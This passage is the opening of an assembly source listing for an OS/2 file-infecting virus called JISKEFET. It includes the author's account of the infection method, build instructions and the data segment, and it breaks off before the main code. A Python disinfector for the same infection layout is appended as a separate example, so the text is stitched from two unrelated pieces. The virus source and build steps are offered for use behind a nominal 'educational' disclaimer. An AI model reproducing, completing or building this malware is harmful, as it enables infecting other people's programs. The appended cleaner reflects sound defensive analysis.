comment #

JISKEFET: a non-resident direct-action OS/2 virus

Disclaimer: This file is only for educational purposes. Do not abuse it!
The author takes no responsibility for anything anyone does with this file.

How does this virus work?

Like most non-resident viruses, it first infects other programs and then
runs the original program. It infects programs by copying the first part of
the program (the same size as the virus) to the end of the program and then
overwriting the beginning with the virus. When an infected program is
executed, the virus makes a copy of the infected program and disinfects it.
It then spawns the disinfected copy. This is perhaps not a very elegant
method. It would be nicer if the virus could just disinfect the current
program and spawn that one. But OS/2 doesn't allow a program that is being
executed to be altered.

The proper way to compile this virus is like this: first, just compile it.
Then check the size of the newly created EXE file. It should be the same as
the value of VIRLEN below. If not, change the value of VIRLEN and compile
again. Unfortunately, I don't know of a way to tell the compiler what the
size of an EXE file will be after compilation. Also check the offset of the
'MK' signature in the EXE file. It should be at offset MKOFF. You might have
to change this one too. To generate an exact copy of the original virus use
MASM.EXE v5.0 and LINK386.EXE v2.00.000.

COMPILE.BAT:
...........................................................................
masm.exe /Zi %1.asm;
link386.exe /exepack %1.obj,,,doscalls.lib,%1.def
...........................................................................

JISKEFET.DEF:
...........................................................................
name Jiskefet windowapi   ;A virus must have a name. This one is
                          ;dedicated to the people of 'Jiskefet',
                          ;the funniest TV program in the Netherlands.
                          ;These guys are really excellent!
                          ;'windowapi' means that this virus will be
                          ;compiled into a P.M. application.
protmode                  ;It will run in protected mode.
stacksize 8192            ;Yes, the virus needs some stack.
...........................................................................

The file doscalls.lib should be in the OS/2 directory. Copy it to your work
directory or enter the full pathname in compile.bat.

To compile this file type: compile jiskefet

#

;==========================================================================

.286                        ;80286 opcodes can be used.
.radix 16                   ;All numbers are hexadecimal
                            ;by default.

VIRLEN  equ 2048d           ;This will be the size of the
                            ;compiled virus.
MKOFF   equ 400             ;At this offset in the EXE file
                            ;will be the 'MK' signature.

_srec   struc               ;Structure with information
cdate   dw ?                ;about a file, returned by the
ctime   dw ?                ;DosFindFirst and DosFindNext
adate   dw ?                ;functions.
atime   dw ?
wdate   dw ?
wtime   dw ?
fsize   dd ?
falloc  dd ?
fattr   dw ?
fcount  db ?
fname   db 100 dup (?)
_srec   ends

extrn DosFindFirst:far      ;These external kernel
extrn DosFindNext:far       ;functions are used by the
extrn DosFindClose:far      ;virus.
extrn DosOpen:far
extrn DosClose:far
extrn DosRead:far
extrn DosWrite:far
extrn DosChgFilePtr:far
extrn DosNewSize:far
extrn DosGetEnv:far
extrn DosExecPgm:far
extrn DosExit:far
extrn DosDelete:far

DGROUP  group _DATA

_DATA   segment word public 'DATA'

                                ;Variables used by the DosFindFirst
                                ;and DosFindNext functions:
filename db '*.EXE', 0          ; Filenames to search for.
dirhan   dw ?                   ; Handle.
sbuf     _srec <>               ; Struct. with returned info.
srchcnt  dw ?                   ; Number of files to search.

                                ;Variables used by DosOpen:
faction  dw ?                   ; Open mode.
fhandle  dw ?                   ; Handle.
fhandle2 dw ?                   ; Handle.

                                ;Variables used by DosRead
                                ;and DosWrite:
rlen     dw ?                   ; Number of read bytes.
wlen     dw ?                   ; Number of written bytes.

                                ;Variables used by
                                ;DosChgFilePtr:
new_off  dw ?, ?                ; New offset.

                                ;Variables used by DosGetEnv:
envseg   dw ?                   ; Segment of environment.
cmdoffs  dw ?                   ; Offset of arguments in env.

                                ;Variables used by DosExecPgm:
objbuf   db (40) dup (?)        ; Buffer for error info.
retcode  dw ?, ?                ; Returns exit code.

                                ;Other variables:
NE_buf   db (40) dup (?)        ; Buffer for NE header.
namebuf  db (100) dup (?)       ; New filename for spawning.
buffer   db (VIRLEN) dup (?)    ; Main buffer.

_DATA   ends

;--------------------------------------------------------------------------
; Main program.
;--------------------------------------------------------------------------

_TEXT   segment word public 'CODE'
        assume cs:_TEXT, ds:DGROUP
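As an added example that is not part of the listing, the following Python cleaner recognises the file layout the description above produces (virus body with its 'MK' marker at MKOFF in front, the host's original first VIRLEN bytes saved at the end) and restores the host by moving the saved head back. It assumes the file was infected exactly as described, that the host was an MZ-headed executable, and that the two-byte marker alone is only a hint, not proof.

```python
"""Recognise and undo the prepend-style infection layout described above.

Layout of an infected EXE (as the description states), n = total size:
  [0, VIRLEN)           virus body, with 'MK' at offset MKOFF
  [VIRLEN, n - VIRLEN)  the untouched remainder of the host
  [n - VIRLEN, n)       the host's original first VIRLEN bytes
VIRLEN and MKOFF mirror the listing: 2048 decimal and 400 hex.
"""
from pathlib import Path
from typing import Optional

VIRLEN = 2048        # size of the compiled virus (listing: VIRLEN equ 2048d)
MKOFF = 0x400        # offset of the 'MK' marker (listing: MKOFF equ 400, .radix 16)
MARKER = b"MK"


def is_infected(image: bytes) -> bool:
    """True if the image is large enough to hold virus + saved head and
    carries the marker where the listing places it. Two bytes at a fixed
    offset are a weak signal, so callers should treat this as a hint."""
    if len(image) < 2 * VIRLEN:
        return False
    return image[MKOFF:MKOFF + len(MARKER)] == MARKER


def disinfect(image: bytes) -> Optional[bytes]:
    """Rebuild the original host, or return None if the layout does not fit.

    Undoes the infection: the saved head at the tail goes back to offset 0
    and the virus body is dropped, so the result is VIRLEN bytes shorter.
    The restored head must start with 'MZ' (assumption: the host was an
    ordinary MZ-headed OS/2 executable); otherwise the marker was a false hit.
    """
    if not is_infected(image):
        return None
    saved_head = image[-VIRLEN:]
    if not saved_head.startswith(b"MZ"):
        return None
    return saved_head + image[VIRLEN:-VIRLEN]


def clean_file(path: Path) -> bool:
    """Disinfect a file in place; returns True only if it was rewritten."""
    restored = disinfect(path.read_bytes())
    if restored is None:
        return False
    path.write_bytes(restored)
    return True
```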